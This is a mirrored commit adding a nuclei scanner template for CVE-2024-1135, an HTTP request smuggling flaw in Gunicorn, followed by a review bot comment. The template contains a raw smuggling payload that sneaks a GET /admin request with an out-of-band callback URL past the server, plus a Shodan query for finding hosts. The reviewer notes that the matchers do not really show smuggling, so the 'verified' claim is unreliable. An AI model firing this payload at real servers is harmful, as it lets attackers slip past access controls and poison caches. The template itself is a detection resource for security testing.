mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
Added template for CVE-2024-1135
61
CVE-2024-1135.yaml
Normal file
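--- a/CVE-2024-1135.yaml
+++ b/CVE-2024-1135.yaml
@@ -0,0 +1,61 @@
+id: CVE-2024-1135
+
+info:
+name: Gunicorn - HTTP Request Smuggling
+author: ManieshNeupane (Pwn4arn)
+severity: high
+description: |
+Gunicorn is vulnerable to HTTP Request Smuggling due to improper validation of the Transfer-Encoding header.
+If a request contains both Content-Length and a malformed or multiple Transfer-Encoding headers, Gunicorn
+may fall back to Content-Length. An attacker can exploit this to bypass security controls, poison caches,
+or manipulate session data.
+impact: |
+Successful exploitation could lead to unauthorized access to administrative endpoints or sensitive data
+by smuggling a secondary request that the server processes as a separate, legitimate request.
+remediation: |
+Update Gunicorn to a version that properly handles Transfer-Encoding headers or ensure the frontend
+proxy strictly validates these headers.
+reference:
+- https://nvd.nist.gov/vuln/detail/CVE-2024-1135
+- https://github.com/benoitc/gunicorn/releases
+- https://huntr.com/bounties/22158e34-cfd5-41ad-97e0-a780773d96c1
+- https://lists.debian.org/debian-lts-announce/2024/06/msg00027.html
+- https://lists.debian.org/debian-lts-announce/2024/12/msg00018.html
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+cvss-score: 7.5
+cve-id: CVE-2024-1135
+cwe-id: CWE-444
+epss-score: 0.00044
+epss-percentile: 0.1288
+metadata:
+verified: true
+max-request: 1
+shodan-query: product:"gunicorn"
+tags: cve,cve2024,gunicorn,smuggling,network
+
+http:
+- raw:
+- |
+POST / HTTP/1.1
+Host: {{Hostname}}
+Content-Length: 6
+Transfer-Encoding: chunked,gzip
+
+73
+
+GET /admin?callback1=https://{{interactsh-url}} HTTP/1.1
+Host: {{Hostname}}
+
+0
+
+matchers-condition: and
+matchers:
+- type: word
+part: interactsh_protocol
+words:
+- "http"
+
+- type: status
+status:
+- 200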
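Review bot: The two matchers at the end of the template do not evidence request smuggling. An `interactsh_protocol` hit of `http` can only occur if the application behind Gunicorn itself fetches the URL passed in `callback1`, which the Transfer-Encoding handling flaw does not cause, and the `status: 200` matcher is satisfied by any ordinary response to `POST /`. As written the template will likely miss vulnerable servers, and where it does fire it would be reporting a different behaviour, so `verified: true` looks unsupported. Consider matching on an observable difference in how the second request on the same connection is answered, or gating on the detected Gunicorn version, and name the fixed release in `remediation` rather than relying on the generic releases link. The `network` tag also does not fit an `http:` template.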